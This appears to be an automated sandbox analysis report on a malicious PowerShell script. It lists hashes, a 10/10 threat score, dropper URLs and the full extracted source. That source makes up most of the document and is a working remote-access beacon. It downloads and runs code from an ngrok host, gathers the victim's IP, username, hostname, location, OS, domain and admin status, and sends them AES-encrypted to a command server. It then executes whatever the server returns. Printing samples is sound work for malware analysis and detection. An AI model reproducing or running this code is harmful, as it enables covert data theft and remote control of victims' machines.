Static task
static1
Behavioral task
behavioral1
Sample
eed116982d3c262a6d5b114d23ba0f70NN.ps1
Resource
win7-20240708-en
windows7-x64
3 signatures
150 seconds
Behavioral task
behavioral2
Sample
eed116982d3c262a6d5b114d23ba0f70NN.ps1
Resource
win10v2004-20240802-en
windows10-2004-x64
4 signatures
150 seconds
General
-
Target
eed116982d3c262a6d5b114d23ba0f70NN
-
Size
4KB
-
MD5
eed116982d3c262a6d5b114d23ba0f70
-
SHA1
76165456d1d03b4eb69af945e385ff91e7778f06
-
SHA256
efabfa6e80a7e6052a8f0b9badf690a680ec247d5eae43eaefa228a503d4c2d7
-
SHA512
92e84db78cd9bb634726c6f6edb170adb315f8f732185a6cafe061802283b6d9a8ae2f649e803a6f27e643cd8cebf9abcc1129ab26bcdac821b40a170c358048
-
SSDEEP
96:UzCILwBo/8badHgwlLRm6nzSmaUE8BhMD7wHFn3:UzCILwBo/V59LRbzSBrPwR3
Score
10/10
Malware Config
Extracted
Language
ps1
Source
1
$serverLocation = "https://mainstream.ngrok.app"
2
$ErrorActionPreference = 'SilentlyContinue'
3
$ProgressPreference = 'SilentlyContinue'
4
$vm_protect = $false
5
6
if ($vm_protect) {
7
VMPROTECT
8
}
9
10
function VMPROTECT {
11
$link = "https://ratte.ngrok.app/Main/antivm.ps1"
12
iex (iwr -uri $link -useb)
13
Write-Host "[!] NOT A VIRTUALIZED ENVIRONMENT" -ForegroundColor Green
14
}
15
16
function Generate-KeyAndIV {
17
param (
18
[string]$apiKey
19
)
20
try {
21
$headers = @{
22
"Api-Key" = $apiKey
23
}
24
$response = Invoke-RestMethod -Uri "$serverLocation/?method=GetKey" -Headers $headers
25
$sessionId = $response.SessionId
26
$key = [System.Convert]::FromBase64String($response.Key)
27
$iv = [System.Convert]::FromBase64String($response.IV)
28
return @($sessionId, $key, $iv)
29
} catch {
30
Write-Host "[!] Error generating key and IV: $_"
31
exit
32
}
33
}
34
35
function Encrypt-Data {
36
param (
37
[byte[]]$key,
38
[byte[]]$iv,
39
[string]$data
40
)
41
try {
42
$aes = [System.Security.Cryptography.Aes]::Create()
43
$aes.Key = $key
44
$aes.IV = $iv
45
$aes.Mode = [System.Security.Cryptography.CipherMode]::CBC
46
$aes.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7
47
48
$encryptor = $aes.CreateEncryptor()
49
$dataBytes = [System.Text.Encoding]::UTF8.GetBytes($data)
50
$encryptedBytes = $encryptor.TransformFinalBlock($dataBytes, 0, $dataBytes.Length)
51
52
return [System.Convert]::ToBase64String($encryptedBytes)
53
} catch {
54
Write-Host "[!] Error encrypting data: $_"
55
exit
56
}
57
}
58
59
function Get-ExternalIP {
60
try {
61
$externalIP = (Invoke-RestMethod -Uri "http://ifconfig.me").Trim()
62
return $externalIP
63
} catch {
64
Write-Host "[!] Error getting external IP: $_"
65
return "N/A"
66
}
67
}
68
69
function Get-UserName {
70
try {
71
return $env:USERNAME
72
} catch {
73
Write-Host "[!] Error getting user name: $_"
74
return "N/A"
75
}
76
}
77
78
function Get-PCName {
79
try {
80
return $env:COMPUTERNAME
81
} catch {
82
Write-Host "[!] Error getting PC name: $_"
83
return "N/A"
84
}
85
}
86
87
function Get-Location {
88
try {
89
$locationData = Invoke-RestMethod -Uri "http://ip-api.com/json"
90
return $locationData
91
} catch {
92
Write-Host "[!] Error getting location: $_"
93
return @{}
94
}
95
}
96
97
function Get-OSVersion {
98
try {
99
return (Get-CimInstance -ClassName Win32_OperatingSystem).Caption
100
} catch {
101
Write-Host "[!] Error getting OS version: $_"
102
return "N/A"
103
}
104
}
105
106
function Get-DomainName {
107
try {
108
$domain = [System.DirectoryServices.ActiveDirectory.Domain]::GetComputerDomain()
109
if ($domain -ne $null) {
110
return $domain.Name
111
} else {
112
return "N/A"
113
}
114
} catch {
115
Write-Host "[!] Error getting domain name: $_"
116
return "N/A"
117
}
118
}
119
120
function Get-BuildType {
121
return "Main" # BUILD
122
}
123
124
function Get-IsAdmin {
125
try {
126
$principal = New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())
127
return $principal.IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)
128
} catch {
129
Write-Host "[!] Error checking admin status: $_"
130
return $false
131
}
132
}
133
134
$apiKey = "4BXeTjJEq8n40"
135
$keyAndIV = Generate-KeyAndIV -apiKey $apiKey
136
$sessionId = $keyAndIV[0]
137
$key = $keyAndIV[1]
138
$iv = $keyAndIV[2]
139
140
$externalIP = Get-ExternalIP
141
$userName = Get-UserName
142
$pcName = Get-PCName
143
$location = Get-Location
144
$country = $location.country
145
$city = $location.city
146
$osVersion = Get-OSVersion
147
$isDomain = Get-DomainName
148
$buildType = Get-BuildType
149
$isAdmin = Get-IsAdmin
150
151
$data = @{
152
"ExternalIP" = $externalIP
153
"UserName" = $userName
154
"PCName" = $pcName
155
"Country" = $country
156
"City" = $city
157
"OSVersion" = $osVersion
158
"IsDomain" = $isDomain
159
"BuildType" = $buildType
160
"IsAdmin" = $isAdmin
161
}
162
163
$jsonData = $data | ConvertTo-Json
164
Write-Host "[!] JSON data: $jsonData"
165
166
$encryptedData = Encrypt-Data -key $key -iv $iv -data $jsonData
167
Write-Host "[!] Encrypted data: $encryptedData"
168
169
$url = "$serverLocation/?method=SubmitInfo"
170
$webClient = New-Object System.Net.WebClient
171
$webClient.Headers.Add("Api-Key", $apiKey)
172
$webClient.Headers.Add("Content-Type", "application/json")
173
174
try {
175
$requestBody = $sessionId + "`n" + $encryptedData
176
$response = $webClient.UploadString($url, $requestBody)
177
Write-Host "[!] Server response: $response"
178
Invoke-Expression -Command $response
179
} catch {
180
Write-Host "[!] Error sending data: $_"
181
}
182
URLs
exe.dropper
https://mainstream.ngrok.app
exe.dropper
https://ratte.ngrok.app/Main/antivm.ps1
Signatures
Files
-
eed116982d3c262a6d5b114d23ba0f70NN.ps1